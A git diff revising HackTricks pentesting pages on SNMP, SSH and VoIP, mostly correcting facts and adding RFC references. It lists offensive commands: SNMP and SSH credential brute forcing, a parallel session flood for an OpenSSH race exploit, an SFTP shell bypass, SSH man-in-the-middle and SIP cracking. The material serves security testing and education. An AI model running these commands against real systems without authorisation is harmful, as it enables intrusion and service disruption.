 - [8] [seanthegeek.net - 459 - Demystifying Dmarc](https://seanthegeek.net/459/demystifying-dmarc)
+- [9] [RFC 5321 – Simple Mail Transfer Protocol](https://www.rfc-editor.org/rfc/rfc5321)
+- [10] [RFC 8314 – Cleartext Considered Obsolete: Use of TLS for Email Submission and Access](https://www.rfc-editor.org/rfc/rfc8314)
+- [11] [RFC 7208 – Sender Policy Framework (SPF)](https://www.rfc-editor.org/rfc/rfc7208)
+- [12] [RFC 6376 – DomainKeys Identified Mail (DKIM) Signatures](https://www.rfc-editor.org/rfc/rfc6376)
+- [13] [RFC 7489 – Domain-based Message Authentication, Reporting, and Conformance (DMARC)](https://www.rfc-editor.org/rfc/rfc7489)
 
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-snmp/README.md
+++ b/src/network-services-pentesting/pentesting-snmp/README.md
@@ -1,11 +1,11 @@
-# 161,162,10161,10162/udp - Pentesting SNMP
+# 161/udp, 162/udp, 10161-10162/tcp/udp - Pentesting SNMP
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
 ## Basic Information
 
-**SNMP - Simple Network Management Protocol** is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
+**SNMP (Simple Network Management Protocol)** is used to monitor and, when write access is authorized, configure networked devices such as routers, switches, printers, servers, and IoT systems.<sup>[[4]](#references)</sup>
 
 ```
 PORT    STATE SERVICE REASON                 VERSION
@@ -13,18 +13,17 @@ PORT    STATE SERVICE REASON                 VERSION
 ```
 
 > [!TIP]
-> SNMP also uses the port **162/UDP** for **traps**. These are data **packets sent from the SNMP server to the client without being explicitly requested**.
+> SNMP managers commonly listen on **162/UDP** for asynchronous notifications from agents. A Trap is unacknowledged, while an InformRequest expects a response.<sup>[[4]](#references)</sup>
 
 ### MIB
 
-To ensure that SNMP access works across manufacturers and with different client-server combinations, the **Management Information Base (MIB)** was created. MIB is an **independent format for storing device information**. A MIB is a **text** file in which all queryable **SNMP objects** of a device are listed in a **standardized** tree hierarchy. It contains at **least one `Object Identifier` (`OID`)**, which, in addition to the necessary **unique address** and a **name**, also provides information about the type, access rights, and a description of the respective object\
-MIB files are written in the `Abstract Syntax Notation One` (`ASN.1`) based ASCII text format. The **MIBs do not contain data**, but they explain **where to find which information** and what it looks like, which returns values for the specific OID, or which data type is used.
+A **Management Information Base (MIB)** is the conceptual collection of managed objects available through SNMP. MIB modules define those objects in a standardized hierarchy using the Structure of Management Information (SMI), an adapted subset of ASN.1. The module definitions describe each object's OID, syntax, access, and semantics; the live values reside in the agent rather than in the definition file.<sup>[[5]](#references)</sup>
 
 ### OIDs
 
 **Object Identifiers (OIDs)** play a crucial role. These unique identifiers are designed to manage objects within a **Management Information Base (MIB)**.
 
-The highest levels of MIB object IDs, or OIDs, are allocated to diverse standard-setting organizations. It is within these top levels that the framework for global management practices and standards is established.
+The upper arcs of the OID tree are delegated to standards bodies and other registration authorities.
 
 Furthermore, vendors are granted the liberty to establish private branches. Within these branches, they have the **autonomy to include managed objects pertinent to their own product lines**. This system ensures that there is a structured and organized method for identifying and managing a wide array of objects across different vendors and standards.
 
@@ -41,14 +40,14 @@ There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid
 
 Here is a breakdown of this address.<sup>[[1]](#references)</sup>
 
-- 1 – this is called the ISO and it establishes that this is an OID. This is why all OIDs start with “1”
+- 1 – the `iso` root arc. Not every possible ASN.1 OID starts with 1; the root also defines arcs 0 and 2.
 - 3 – this is called ORG and it is used to specify the organization that built the device.
 - 6 – this is the dod or the Department of Defense which is the organization that established the Internet first.
 - 1 – this is the value of the internet to denote that all communications will happen through the Internet.
 - 4 – this value determines that this device is made by a private organization and not a government one.
 - 1 – this value denotes that the device is made by an enterprise or a business entity.
 
-These first six values tend to be the same for all devices and they give you the basic information about them. This sequence of numbers will be the same for all OIDs, except when the device is made by the government.
+The prefix `1.3.6.1.4.1` is the widely used `internet.private.enterprises` branch. It is common for vendor-specific objects, but standards-defined objects and other registered branches use different prefixes; the distinction is not simply government versus private devices.
 
 Moving on to the next set of numbers.
 
@@ -68,31 +67,30 @@ The rest of the values give specific information about the device.
 
 ### SNMP Versions
 
-There are 2 important versions of SNMP:
+The versions most likely to be encountered are:
 
-- **SNMPv1**: Main one, it is still the most frequent, the **authentication is based on a string** (community string) that travels in **plain-text** (all the information travels in plain text). **Version 2 and 2c** send the **traffic in plain text** also and uses a **community string as authentication**.
-- **SNMPv3**: Uses a better **authentication** form and the information travels **encrypted** using (**dictionary attack** could be performed but would be much harder to find the correct creds than in SNMPv1 and v2).
+- **SNMPv1 and SNMPv2c**: Common community-based models. The community string and management data are not cryptographically protected, so anyone able to observe the traffic can read them.
+- **SNMPv3**: Separates message processing, security, and access control. Its standard security levels are `noAuthNoPriv`, `authNoPriv`, and `authPriv`; only `authPriv` provides both message authentication and encryption/privacy. Weak authentication secrets may still be susceptible to offline guessing after capturing the required exchange.<sup>[[6]](#references)</sup>
 
 ### Community Strings
 
-As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\
-The are **2 types of community strings**:
+For community-based SNMPv1/v2c, the requester normally needs an accepted community string; SNMPv3 uses a security name and the credentials required by the configured security level. `public` and `private` are common defaults, not protocol-defined types:
 
-- **`public`** mainly **read only** functions
-- **`private`** **Read/Write** in general
+- **`public`** is conventionally configured read-only.
+- **`private`** is conventionally configured read-write.
 
 Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**\
-If you try to **write** an object a **`noSuchName` or `readOnly` error** is received**.**
+An unauthorized or invalid SET can return version- and condition-specific errors such as `noAccess`, `notWritable`, `wrongType`, or legacy `noSuchName`/`readOnly` compatibility values.<sup>[[7]](#references)</sup>
 
-In versions 1 and 2/2c if you to use a **bad** community string the server wont **respond**. So, if it responds, a **valid community strings was used**.
+Agents commonly drop SNMPv1/v2c requests with an invalid community string, so a syntactically valid SNMP response is strong evidence that the community was accepted. A timeout alone is inconclusive because filtering, packet loss, rate limiting, and unsupported versions produce the same symptom.
 
 ## Ports
 
-[From Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol):<sup>[[2]](#references)</sup>
+[The standard port mappings are]:<sup>[[2]](#references)[[8]](#references)</sup>
 
 - The SNMP agent receives requests on UDP port **161**.
 - The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#InformRequest)) on port **162**.
-- When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security), requests are received on port **10161** and notifications are sent to port **10162**.
+- SNMP over TLS uses TCP **10161/10162**, while SNMP over DTLS uses UDP **10161/10162**; the lower port is for command traffic and the higher port for notifications.
 
 ## Brute-Force Community String (v1 and v2c)
 
@@ -100,7 +98,7 @@ To **guess the community string** you could perform a dictionary attack. Check [
 
 ## Enumerating SNMP
 
-It is recommanded to install the following to see whats does mean **each OID gathered** from the device:
+Install the relevant MIB definitions to resolve numeric OIDs into names and descriptions:
 
 ```bash
 apt-get install snmp-mibs-downloader
@@ -127,15 +125,13 @@ nmap --script "snmp* and not snmp-brute" <target>
 braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
 ```
 
-Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command :
+If the Net-SNMP `extend` feature is configured and exposed to the tested principal, query its output with:
 
 ```bash
 snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
 ```
 
-**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** address), Usernames, Uptime, Server/OS version, and **processes**
-
-**running** (may contain passwords)....
+Depending on the enabled MIB modules and access-control view, SNMP may reveal network interfaces and addresses, usernames, uptime, OS/version information, storage, and running processes. Process command lines or extension output can occasionally expose secrets.
 
 ### **Dangerous Settings**
 
@@ -145,12 +141,12 @@ In the realm of network management, certain configurations and parameters are ke
 
 Two main settings enable access to the **full OID tree**, which is a crucial component in network management:
 
-1. **`rwuser noauth`** is set to permit full access to the OID tree without the need for authentication. This setting is straightforward and allows for unrestricted access.
+1. **`rwuser USER noauth`** grants the named SNMPv3 security user read-write access at the `noAuthNoPriv` security level. `noauth` means messages need neither authentication nor privacy; it does not remove the required user/security-name mapping. An optional OID or view can restrict the accessible subtree.<sup>[[9]](#references)</sup>
 2. For more specific control, access can be granted using:
    - **`rwcommunity`** for **IPv4** addresses, and
    - **`rwcommunity6`** for **IPv6** addresses.
 
-Both commands require a **community string** and the relevant IP address, offering full access irrespective of the request's origin.
+These directives require a community string and can optionally restrict the source and accessible OID/view. Without those restrictions, a read-write community can expose every writable object supported by the agent.<sup>[[9]](#references)</sup>
 
 ### SNMP Parameters for Microsoft Windows
 
@@ -166,27 +162,17 @@ A series of **Management Information Base (MIB) values** are utilized to monitor
 
 ### Cisco
 
-Take a look to this page if you are Cisco equipment:
-
-
-{{#ref}}
-cisco-snmp.md
-{{#endref}}
+For Cisco-specific enumeration, see [Cisco SNMP](cisco-snmp.md).
 
 ## From SNMP to RCE
 
-If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**:
-
-
-{{#ref}}
-snmp-rce.md
-{{#endref}}
+If you have a community or SNMPv3 principal that can write sensitive objects, command execution may be possible on agents exposing executable extension MIBs. See [SNMP to RCE](snmp-rce.md).
 
 ## **Massive SNMP**
 
-[Braa ](https://github.com/mteg/braa)is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
+[Braa](https://github.com/mteg/braa) is a mass SNMP scanner. Unlike `snmpwalk` from Net-SNMP, it can query many hosts concurrently in one process, which makes it efficient but also easy to run at a disruptive rate.
 
-Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
+Braa implements its own SNMP stack, so it does not require a library such as Net-SNMP.
 
 **Syntax:** braa \[Community-string]@\[IP of SNMP server]:\[iso id]
 
@@ -194,7 +180,7 @@ Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like 
 braa ignite123@192.168.1.125:.1.3.6.*
 ```
 
-This can extract a lot MB of information that you cannot process manually.
+This can extract many megabytes of information, so save and filter the output systematically.
 
 So, lets look for the most interesting information (from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)):<sup>[[3]](#references)</sup>
 
@@ -236,7 +222,7 @@ You can use _**NetScanTools**_ to **modify values**. You will need to know the *
 
 ## Spoofing
 
-If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic.
+If an ACL authorizes SNMP solely by source IP, a forged UDP source may cause the agent to send a response to that authorized address. The attacker will not receive the response unless they are on-path, control that address, or can otherwise observe/reroute the reply. Stateful filtering and SNMPv3 authentication prevent this from becoming a general read primitive.
 
 ## Examine SNMP Configuration files
 
@@ -250,7 +236,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can 
 ```
 Protocol_Name: SNMP    #Protocol Abbreviation if there is one.
 Port_Number:  161     #Comma separated if there is more than one.
-Protocol_Description: Simple Network Managment Protocol         #Protocol Abbreviation Spelled out
+Protocol_Description: Simple Network Management Protocol         #Protocol Abbreviation Spelled out
 
 Entry_1:
   Name: Notes
@@ -258,7 +244,7 @@ Entry_1:
   Note: |
     SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
 
-    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html
+    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html
 
 Entry_2:
   Name: SNMP Check
@@ -288,5 +274,11 @@ Entry_5:
 - [1] [SNMP MIB and OIDs explained](https://www.netadmintools.com/snmp-mib-and-oids/)
 - [2] [Simple Network Management Protocol (Wikipedia)](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol)
 - [3] [SNMP Data Harvesting During Penetration Testing (Rapid7)](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)
+- [4] [RFC 3413 – SNMP Applications](https://www.rfc-editor.org/rfc/rfc3413)
+- [5] [RFC 2578 – Structure of Management Information Version 2](https://www.rfc-editor.org/rfc/rfc2578)
+- [6] [RFC 3411 – Architecture and SNMP security levels](https://www.rfc-editor.org/rfc/rfc3411)
+- [7] [RFC 3416 – SNMPv2 protocol operations and error statuses](https://www.rfc-editor.org/rfc/rfc3416)
+- [8] [RFC 6353 – SNMP over TLS and DTLS](https://www.rfc-editor.org/rfc/rfc6353)
+- [9] [Net-SNMP `snmpd.conf` access-control directives](https://manpages.debian.org/testing/snmpd/snmpd.conf.5.en.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-ssh.md
+++ b/src/network-services-pentesting/pentesting-ssh.md
@@ -2,7 +2,7 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basic information
 
 **SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.
 
@@ -14,7 +14,7 @@
 
 **SSH servers:**
 
-- [openSSH](http://www.openssh.org) – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
+- [OpenSSH](https://www.openssh.com) – OpenBSD's SSH implementation, shipped in BSD and Linux distributions and available in Windows since Windows 10
 - [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
 - [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) – SSH implementation for Windows, the client is commonly used but the use of the server is rarer
 - [CopSSH](https://www.itefix.net/copssh) – implementation of OpenSSH for Windows
@@ -36,7 +36,7 @@ nc -vn <IP> 22
 
 ### Automated ssh-audit
 
-ssh-audit is a tool for ssh server & client configuration auditing.<sup>[[6]](#references)</sup>
+`ssh-audit` is a tool for auditing SSH server and client configurations.<sup>[[6]](#references)</sup>
 
 [https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) is an updated fork from [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
 
@@ -85,7 +85,7 @@ ssh-keyscan -t rsa <IP> -p <PORT>
 
 ### Weak Cipher Algorithms
 
-This is discovered by default by **nmap**. But you can also use **sslcan** or **sslyze**.
+Nmap's SSH scripts and `ssh-audit` can identify weak SSH algorithms. TLS-specific tools such as `sslscan` and `sslyze` do not audit SSH.
 
 ### Nmap scripts
 
@@ -113,11 +113,11 @@ msf> use scanner/ssh/ssh_enumusers
 
 ### [Brute force](../generic-hacking/brute-force.md#ssh)
 
-Some common ssh credentials [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) and below.
+Some common SSH credentials are available [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt), [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt), and in the table below.
 
 ### Private Key Brute Force
 
-If you know some ssh private keys that could be used... let's try it. You can use the nmap script:
+If you have candidate SSH private keys, test them with the following Nmap script:
 
 ```
 https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
@@ -140,7 +140,7 @@ https://github.com/rapid7/ssh-badkeys/tree/master/authorized
 
 #### Weak SSH keys / Debian predictable PRNG
 
-Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced. Pre-generated sets of keys generated on Debian systems affected by weak PRNG are available here: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
+Some systems have known flaws in the random seed used to generate cryptographic material. This can dramatically reduce the keyspace and make brute force feasible. Pre-generated keys from Debian systems affected by the weak PRNG are available in [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
 
 You should look here in order to search for valid keys for the victim machine.
 
@@ -201,7 +201,7 @@ If you are in the local network as the victim which is going to connect to the S
 
 [**SSH MITM**](https://github.com/jtesta/ssh-mitm) does exactly what is described above.
 
-In order to capture perform the actual MitM you could use techniques like ARP spoofing, DNS spoofin or others described in the [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing).
+To perform the man-in-the-middle attack, use techniques such as ARP or DNS spoofing, as described under [**network spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing).
 
 ## SSH-Snake
 
@@ -214,20 +214,20 @@ SSH-Snake performs the following tasks automatically and recursively:
 3. Attempt to SSH into all of the destinations using all of the private keys discovered,
 4. If a destination is successfully connected to, repeats steps #1 - #4 on the connected-to system.
 
-It's completely self-replicating and self-propagating -- and completely fileless.
+It is self-replicating, self-propagating, and fileless.
 
-## Config Misconfigurations
+## Configuration weaknesses
 
 ### Root login
 
-It's common for SSH servers to allow root user login by default, which poses a significant security risk. **Disabling root login** is a critical step in securing the server. Unauthorized access with administrative privileges and brute force attacks can be mitigated by making this change.
+OpenSSH currently defaults `PermitRootLogin` to `prohibit-password`, which still allows root login with public-key authentication. Setting it to `no` disables direct root login entirely and reduces the impact of stolen root credentials or keys.<sup>[[8]](#references)</sup>
 
 **To Disable Root Login in OpenSSH:**
 
-1. **Edit the SSH config file** with: `sudoedit /etc/ssh/sshd_config`
-2. **Change the setting** from `#PermitRootLogin yes` to **`PermitRootLogin no`**.
-3. **Reload the configuration** using: `sudo systemctl daemon-reload`
-4. **Restart the SSH server** to apply changes: `sudo systemctl restart sshd`
+1. **Edit the SSH server configuration:** `sudoedit /etc/ssh/sshd_config`.
+2. **Set** `PermitRootLogin no`.
+3. **Validate the configuration:** `sudo sshd -t`.
+4. **Reload SSH without dropping established sessions:** `sudo systemctl reload sshd` (the unit may be named `ssh` on some distributions).
 
 ### SFTP Brute Force
 
@@ -235,7 +235,7 @@ It's common for SSH servers to allow root user login by default, which poses a s
 
 ### SFTP command execution
 
-There is a common oversight occurs with SFTP setups, where administrators intend for users to exchange files without enabling remote shell access. Despite setting users with non-interactive shells (e.g., `/usr/bin/nologin`) and confining them to a specific directory, a security loophole remains. **Users can circumvent these restrictions** by requesting the execution of a command (like `/bin/bash`) immediately after logging in, before their designated non-interactive shell takes over. This allows for unauthorized command execution, undermining the intended security measures.
+A common oversight occurs in SFTP setups where administrators intend to permit file exchange without enabling remote shell access. Merely assigning a non-interactive shell such as `/usr/bin/nologin` does not replace SSH-level authorization. If the server configuration still accepts session commands, a user may request a command such as `/bin/bash`. Enforce the restriction with `ForceCommand internal-sftp` and disable forwarding and TTY allocation as shown below.<sup>[[2]](#references)</sup>
 
 [Example from here](https://community.turgensec.com/ssh-hacking-guide/):<sup>[[2]](#references)</sup>
 
@@ -262,7 +262,7 @@ debug1: Exit status 0
 $ ssh noraj@192.168.1.94 /bin/bash
 ```
 
-Here is an example of secure SFTP configuration (`/etc/ssh/sshd_config` – openSSH) for the user `noraj`:<sup>[[2]](#references)</sup>
+Here is an example of a secure OpenSSH SFTP configuration (`/etc/ssh/sshd_config`) for the user `noraj`:<sup>[[2]](#references)</sup>
 
 ```
 Match User noraj
@@ -286,7 +286,7 @@ sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compro
 
 ### SFTP Symlink
 
-The **sftp** have the command "**symlink**". Therefor, if you have **writable rights** in some folder, you can create **symlinks** of **other folders/files**. As you are probably **trapped** inside a chroot this **won't be specially useful** for you, but, if you can **access** the created **symlink** from a **no-chroot** **service** (for example, if you can access the symlink from the web), you could **open the symlinked files through the web**.
+SFTP supports the **`symlink`** command. With write access to a directory, you may be able to create symbolic links to other files or directories. A chrooted SFTP process normally cannot follow a link outside its root, but another non-chrooted service that exposes the same filesystem path (for example, a web server) may resolve the link in its own namespace and disclose the target.
 
 For example, to create a **symlink** from a new file **"**_**froot**_**" to "**_**/**_**"**:
 
@@ -298,7 +298,7 @@ If you can access the file "_froot_" via web, you will be able to list the root 
 
 ### Authentication methods
 
-On high security environment it’s a common practice to enable only key-based or two factor authentication rather than the simple factor password based authentication. But often the stronger authentication methods are enabled without disabling the weaker ones. A frequent case is enabling `publickey` on openSSH configuration and setting it as the default method but not disabling `password`. So by using the verbose mode of the SSH client an attacker can see that a weaker method is enabled:
+In high-security environments, it is common to require key-based or multi-factor authentication instead of password-only authentication. However, administrators sometimes enable a stronger method without disabling weaker ones. For example, an OpenSSH server may offer `publickey` first while still accepting `password`. An assessor can identify all offered methods with verbose client output:
 
 ```bash
 ssh -v 192.168.1.94
@@ -315,9 +315,7 @@ ssh -v 192.168.1.94 -o PreferredAuthentications=password
 debug1: Next authentication method: password
 ```
 
-Review the SSH server configuration is necessary to check that only expected\
-methods are authorized. Using the verbose mode on the client can help to see\
- the effectiveness of the configuration.
+Review the SSH server configuration to ensure that only the expected authentication methods are authorized. Verbose client output helps verify the effective configuration.
 
 ### Config files
 
@@ -345,7 +343,7 @@ Exploitation is timing-based: hammer the daemon with half-open sessions that nev
 
 Operator tips:<sup>[[4]](#references)</sup>
 
-- Fingerprint builds with `ssh -V` (remote banner) or `ssh -G <target> | grep ^userauths` and confirm `LoginGraceTime` is non-zero.
+- Capture the remote banner with `nc -nv <target> 22` or `ssh -vv <target>`; then confirm the installed package build and effective `LoginGraceTime` locally or through authenticated configuration review.
 - Pressure-test a lab target by spamming short-lived sessions that request no authentication, for example:
   ```bash
   parallel -j200 "timeout 3 ssh -o PreferredAuthentications=none -o ConnectTimeout=2 attacker@${TARGET}" ::: {1..4000}
@@ -364,7 +362,7 @@ Several SSH server implementations contain logic flaws in the **authentication f
 
 At a protocol level any SSH message with a _message code_ **≥ 80** (0x50) belongs to the *connection* layer (RFC 4254) and must **only be accepted after successful authentication** (RFC 4252).  If the server processes one of those messages while still in the *SSH_AUTHENTICATION* state, the attacker can immediately create a channel and request actions such as command execution, port-forwarding, etc.<sup>[[1]](#references)</sup>
 
-### Generic Exploitation Steps
+### Generic exploitation steps
 1. Establish a TCP connection to the target’s SSH port (commonly 22, but other services may expose Erlang/OTP on 2022, 830, 2222…).
 2. Craft a raw SSH packet:
    * 4-byte **packet_length** (big-endian)
@@ -429,7 +427,7 @@ Entry_1:
   Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh
 
 Entry_2:
-  Name: consolesless mfs enumeration
+  Name: consoleless MSF enumeration
   Description: SSH enumeration without the need to run msfconsole
   Note: sourced from https://github.com/carlospolop/legion
   Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
@@ -445,5 +443,6 @@ Entry_2:
 - [5] [Snyk – The XZ backdoor (CVE-2024-3094)](https://snyk.io/blog/the-xz-backdoor-cve-2024-3094/)
 - [6] [SSH hardening guides](https://www.ssh-audit.com/hardening_guides.html)
 - [7] [Pentesting Kerberos (88) – client setup and troubleshooting](pentesting-kerberos-88/README.md)
+- [8] [OpenBSD manual – `sshd_config(5)`](https://man.openbsd.org/sshd_config)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-voip/README.md
+++ b/src/network-services-pentesting/pentesting-voip/README.md
@@ -12,7 +12,7 @@ To start learning about how VoIP works check:
 basic-voip-protocols/
 {{#endref}}
 
-## Basic Messages
+## Basic messages<sup>[[7]](#references)</sup>
 
 ```
 Request name	Description								RFC references
@@ -33,7 +33,7 @@ INFO		Send mid-session information that does not modify the session state.	RFC 6
 OPTIONS		Query the capabilities of an endpoint					RFC 3261
 ```
 
-## Response Codes
+## Response codes<sup>[[7]](#references)</sup>
 
 **1xx—Provisional Responses**
 
@@ -146,7 +146,7 @@ OPTIONS		Query the capabilities of an endpoint					RFC 3261
 
 ### Telephone Numbers
 
-One of the first steps a Red Team could do is to search available phone numbers to contact with the company using OSINT tools, Google Searches or scraping the web pages.
+One of a red team's first steps can be to identify company telephone numbers with OSINT tools, Google searches, or web scraping.
 
 Once you have the telephone numbers you could use online services to identify the operator:
 
@@ -155,9 +155,9 @@ Once you have the telephone numbers you could use online services to identify th
 - [https://www.whitepages.com/](https://www.whitepages.com/)
 - [https://www.twilio.com/lookup](https://www.twilio.com/lookup)
 
-Knowing if the operator provides VoIP services you could identify if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect it's own VoIP PBX to the traditional telephony network.
+Knowing whether the operator provides VoIP services can help determine whether the company uses VoIP. A company may also connect its own VoIP PBX to the traditional telephony network with PSTN cards instead of buying a managed VoIP service.
 
-Things such as automated responses of music usually indicates that VoIP is being used.
+Automated responses or music on hold can also indicate that VoIP is in use.
 
 ### Google Dorks
 
@@ -199,7 +199,7 @@ Any other OSINT enumeration that helps to identify VoIP software being used will
 
 ### Network Enumeration
 
-- **`nmap`** is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not be very accurate with this kind of services.
+- **Nmap** can scan UDP services, but broad UDP scans are slow and may be less accurate than targeted probes.
 
 ```bash
 sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
@@ -213,7 +213,7 @@ sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
 svmap 10.10.0.0/24 -p 5060-5070 [--fp]
 ```
 
-- **`SIPPTS scan`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS scan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).<sup>[[1]](#references)</sup>
+- **`SIPPTS scan`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS scan is a fast scanner for SIP services over UDP, TCP, or TLS. It uses multithreading and can scan large network ranges. You can specify a port range, scan TCP and UDP, select a method (the default is `OPTIONS`), and customize the User-Agent.<sup>[[1]](#references)</sup>
 
 ```bash
 sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
@@ -262,7 +262,7 @@ It is very important to analyse the headers that a server sends back to us, depe
 sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp
 ```
 
-It is also possible to obtain data if the server uses websockets. With `SIPPTS wssend` from [**sippts**](https://github.com/Pepelux/sippts) we can send personalised WS messages.
+It is also possible to obtain data when the server uses WebSockets. `SIPPTS wssend` from [**sippts**](https://github.com/Pepelux/sippts) can send customized WebSocket messages.
 
 ```bash
 sippts wssend -i 10.10.0.10 -r 443 -path /ws
@@ -328,7 +328,7 @@ sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
 
 ### VoIP Sniffing
 
-If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) between the **PBX and the gateway** in order to sniff the information.
+If you find VoIP equipment on an **open Wi-Fi network**, you may be able to **sniff its traffic**. On a more restricted network (connected via Ethernet or protected Wi-Fi), you could perform **man-in-the-middle attacks such as** [**ARP spoofing**](../../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) between the **PBX and the gateway** to inspect the traffic.
 
 Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more.
 
@@ -340,9 +340,9 @@ To get this information you could use tools such as Wireshark, tcpdump... but a 
 
 #### SIP credentials (Password Brute-Force - offline)
 
-[Check this example to understand better a **SIP REGISTER communication**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are **credentials being sent**.
+[Review this **SIP REGISTER example**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to understand how credentials are transmitted.
 
-- **`sipdump`** & **`sipcrack`,** part of **sipcrack** (`apt-get install sipcrack`): These tools can **extract** from a **pcap** the **digest authentications** within the SIP protocol and **bruteforce** them.<sup>[[6]](#references)</sup>
+- **`sipdump`** and **`sipcrack`**, part of **sipcrack** (`apt-get install sipcrack`): These tools can extract SIP digest authentication exchanges from a **PCAP** and brute-force them offline.<sup>[[6]](#references)</sup>
 
 ```bash
 sipdump -p net-capture.pcap sip-creds.txt
@@ -369,25 +369,27 @@ sippts tshark -f capture.pcap [-filter auth]
 
 #### DTMF codes
 
-**Not only SIP credentials** can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the **voicemail**.\
-It's possible to send these codes in **INFO SIP messages**, in **audio** or inside **RTP packets**. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them:
+Network traffic may reveal not only SIP credentials but also DTMF codes used to access services such as **voicemail**.\
+These codes can be sent in SIP `INFO` messages, as audio, or inside RTP packets. If the codes are in RTP packets, extract that part of the conversation and use `multimon` to decode them:
 
 ```bash
 multimon -a DTMF -t wac pin.wav
 ```
 
